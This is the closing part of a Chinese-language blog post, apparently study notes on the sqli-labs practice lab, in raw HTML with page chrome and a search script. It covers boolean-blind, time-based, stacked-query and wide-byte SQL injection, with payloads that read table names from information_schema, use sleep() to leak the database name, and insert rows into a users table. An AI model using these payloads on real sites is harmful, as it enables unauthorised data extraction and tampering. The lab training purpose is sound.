class="number">1</span>,<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27; and ascii(substr((select table_name from information_schema.tables where table_schema=&#x27;</span>security<span class="string">&#x27; limit 0,1),1,1))=101 --+</span></span><br></pre></td></tr></table></figure>
<p>接下来一个表一个表的爆破</p>
<h3 id="SQL注入类型——时间盲注-Less-9"><a href="#SQL注入类型——时间盲注-Less-9" class="headerlink" title="SQL注入类型——时间盲注(Less-9)"></a>SQL注入类型——时间盲注(Less-9)</h3><p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/63.png" alt></p>
<h4 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h4><h5 id="first-2"><a href="#first-2" class="headerlink" title="first"></a>first</h5><p>输入’，发现无报错无回显，且页面无变化，不知道是否与数据库有交互</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/75.png" alt></p>
<p>用sleep()函数求闭合字符，但要注意排除网络原因（将页面沉睡时间设长一些）</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/76.png" alt></p>
<p>也可直接查看页面返回时间：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/77.png" alt></p>
<p>若无’，发现sleep函数没生效，说明语句有误：</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/78.png" alt></p>
<p>由此判断’是闭合字符</p>
<h5 id="second-2"><a href="#second-2" class="headerlink" title="second"></a>second</h5><p>查询数据库名</p>
<p>if(条件,命令1,命令2) </p>
<p>若条件正确，执行命令1；否则执行命令2</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="string">&#x27; and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+</span></span><br></pre></td></tr></table></figure>
<p>此时无法应用BP爆破，因返回相同，无法通过长度判断</p>
<h3 id="SQL注入类型——堆叠查询-Less-38"><a href="#SQL注入类型——堆叠查询-Less-38" class="headerlink" title="SQL注入类型——堆叠查询(Less-38)"></a>SQL注入类型——堆叠查询(Less-38)</h3><p>即一次性执行多个sql语句</p>
<p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/79.png" alt></p>
<h4 id="Less-38"><a href="#Less-38" class="headerlink" title="Less-38"></a>Less-38</h4><p>使用联合查询、报错注入亦可</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span> <span class="string">&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;</span>users<span class="string">&#x27;;insert into users values(18,&#x27;</span>zhong<span class="string">&#x27;,&#x27;</span>zhong<span class="string">&#x27;)--+</span></span><br></pre></td></tr></table></figure>
<h3 id="SQL注入类型——宽字节注入-Less-32"><a href="#SQL注入类型——宽字节注入-Less-32" class="headerlink" title="SQL注入类型——宽字节注入(Less-32)"></a>SQL注入类型——宽字节注入(Less-32)</h3><p><img src="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/80.png" alt></p>
<h4 id="Less-32"><a href="#Less-32" class="headerlink" title="Less-32"></a>Less-32</h4><p>%df</p>
<p>%5c为/</p>
<h3 id="post注入Less-11"><a href="#post注入Less-11" class="headerlink" title="post注入Less-11"></a>post注入Less-11</h3><p>先抓包再测试</p>
<h2 id="sqli-labs工具破解"><a href="#sqli-labs工具破解" class="headerlink" title="sqli-labs工具破解"></a>sqli-labs工具破解</h2>
      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2023/06/13/setup/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2023-09-17 20:54:03
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%EF%BC%88SQL-Injection%EF%BC%89"><span class="toc-text">SQL注入（SQL Injection）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9A%E4%B9%89%EF%BC%88%E8%BF%87%E7%A8%8B%EF%BC%89"><span class="toc-text">定义（过程）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%A2%E6%88%90%E5%8E%9F%E5%9B%A0"><span class="toc-text">形成原因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E7%A8%8B"><span class="toc-text">常见过程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL-injection%E5%8F%82%E6%95%B0"><span class="toc-text">SQL injection参数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E8%BF%87%E7%A8%8B%E4%B8%AD%E7%9A%84%E4%BD%9C%E7%94%A8"><span class="toc-text">在渗透测试过程中的作用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%87%BA%E7%8E%B0%E4%BD%8D%E7%BD%AE"><span class="toc-text">出现位置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%AF%BB%E6%89%BE%E6%96%B9%E5%BC%8F"><span class="toc-text">SQL注入漏洞寻找方式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%A4%E6%96%AD%E4%BE%9D%E6%8D%AE"><span class="toc-text">SQL注入漏洞判断依据</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81SQL%E6%B5%8B%E8%AF%95%E8%AF%AD%E5%8F%A5"><span class="toc-text">常见SQL测试语句</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E9%87%8A%E5%AD%97%E7%AC%A6"><span class="toc-text">注释字符</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E6%93%8D%E8%BF%87%E7%A8%8B"><span class="toc-text">实操过程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="toc-text">知识点</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5"><span class="toc-text">sqli-labs手工注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-text">前置知识</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%E2%80%94%E2%80%94%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%EF%BC%88Less-1%EF%BC%8C2%EF%BC%8C3%EF%BC%8C4%EF%BC%89"><span class="toc-text">SQL注入类型——联合查询（Less-1，2，3，4）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-1"><span class="toc-text">Less-1</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#first"><span class="toc-text">first</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#second"><span class="toc-text">second</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#third"><span class="toc-text">third</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#forth"><span class="toc-text">forth</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-2"><span class="toc-text">Less-2</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-3"><span class="toc-text">Less-3</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5%E7%BB%83%E4%B9%A0"><span class="toc-text">sql注入练习</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%E2%80%94%E2%80%94%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%88Less-5%EF%BC%8C6%EF%BC%89"><span class="toc-text">SQL注入类型——报错注入（Less-5，6）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-5"><span class="toc-text">Less-5</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#first-1"><span class="toc-text">first</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#second-1"><span class="toc-text">second</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%E2%80%94%E2%80%94%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8-Less-8"><span class="toc-text">SQL注入类型——布尔盲注(Less-8)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-8"><span class="toc-text">Less-8</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#first-%E6%B1%82%E9%97%AD%E5%90%88%E5%AD%97%E7%AC%A6"><span class="toc-text">first 求闭合字符</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#second-%E6%B1%82%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E9%95%BF%E5%BA%A6length"><span class="toc-text">second 求数据库名长度length()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#third-%E6%B1%82%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%9A%84ascii%E5%80%BC-substr"><span class="toc-text">third 求数据库名的ascii值 substr</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#forth-%E6%B1%82%E8%A1%A8%E7%9A%84%E6%95%B0%E9%87%8Fcount"><span class="toc-text">forth 求表的数量count()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#fifth-%E6%B1%82%E8%A1%A8%E7%9A%84%E9%95%BF%E5%BA%A6"><span class="toc-text">fifth 求表的长度</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%E2%80%94%E2%80%94%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8-Less-9"><span class="toc-text">SQL注入类型——时间盲注(Less-9)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-9"><span class="toc-text">Less-9</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#first-2"><span class="toc-text">first</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#second-2"><span class="toc-text">second</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%E2%80%94%E2%80%94%E5%A0%86%E5%8F%A0%E6%9F%A5%E8%AF%A2-Less-38"><span class="toc-text">SQL注入类型——堆叠查询(Less-38)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-38"><span class="toc-text">Less-38</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%E2%80%94%E2%80%94%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5-Less-32"><span class="toc-text">SQL注入类型——宽字节注入(Less-32)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-32"><span class="toc-text">Less-32</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#post%E6%B3%A8%E5%85%A5Less-11"><span class="toc-text">post注入Less-11</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs%E5%B7%A5%E5%85%B7%E7%A0%B4%E8%A7%A3"><span class="toc-text">sqli-labs工具破解</span></a></li></ol></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="email" href="">
            <i class="iconfont icon-envelope"></i>
          </a>
        </li>
      
        <li>
          <a title="facebook" href="">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" href="">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
        <li>
          <a title="wechat" href="">
            <i class="iconfont icon-wechat"></i>
          </a>
        </li>
      
        <li>
          <a title="weibo" href="">
            <i class="iconfont icon-weibo"></i>
          </a>
        </li>
      
        <li>
          <a title="rss" href="/atom.xml">
            <i class="iconfont icon-rss"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © Oranges 2021</a>
        
    </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E + '&url=' + http%3A%2F%2Fyy-ll.github.io%2F2023%2F09%2F17%2FSQL%25E6%25B3%25A8%25E5%2585%25A5%25E6%25BC%258F%25E6%25B4%259E%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://yy-ll.github.io/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
</body>
</html>
